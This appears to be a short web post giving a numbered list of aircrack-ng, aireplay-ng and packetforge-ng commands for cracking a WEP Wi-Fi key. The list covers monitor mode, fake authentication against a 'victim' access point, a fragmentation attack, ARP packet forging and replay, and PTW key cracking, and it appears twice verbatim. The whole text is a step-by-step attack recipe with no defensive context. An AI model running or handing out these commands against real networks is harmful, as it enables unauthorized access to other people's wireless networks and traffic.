the Commands
1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode)
2)sudo wlanconfig ath0 destroy
3)sudo ifconfig ath1 up (makes ur ath1 interface up)
4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11)
5)sudo aireplay-ng -1 0 -e linksys -a victims MAC address -h your MAC address ath1 ( Sending Authentication Request)
6)sudo aireplay-ng -5 -b victims MAC address -h your MAC address ath1 (fragmentation attack)
7)packetforge-ng -0 -a victims MAC address -h your MAC address -k 255.255.255.255 -l 255.255.255.255 -y ur xor file.xor -w arp-request (generate an arp packet)
8)sudo airodump-ng -c 11 –bssid victims MAC address -w capture ath1 (monitors the AP)
9)sudo aireplay-ng -2 -r arp-request ath1 (sending the Arp-request with use interactive frame selection)
10)sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with “capture” and ending in “cap”.) “-z ptw attack
1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode)
2)sudo wlanconfig ath0 destroy
3)sudo ifconfig ath1 up (makes ur ath1 interface up)
4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11)
5)sudo aireplay-ng -1 0 -e linksys -a victims MAC address -h your MAC address ath1 ( Sending Authentication Request)
6)sudo aireplay-ng -5 -b victims MAC address -h your MAC address ath1 (fragmentation attack)
7)packetforge-ng -0 -a victims MAC address -h your MAC address -k 255.255.255.255 -l 255.255.255.255 -y ur xor file.xor -w arp-request (generate an arp packet)
8)sudo airodump-ng -c 11 –bssid victims MAC address -w capture ath1 (monitors the AP)
9)sudo aireplay-ng -2 -r arp-request ath1 (sending the Arp-request with use interactive frame selection)
10)sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with “capture” and ending in “cap”.) “-z ptw attack
Comments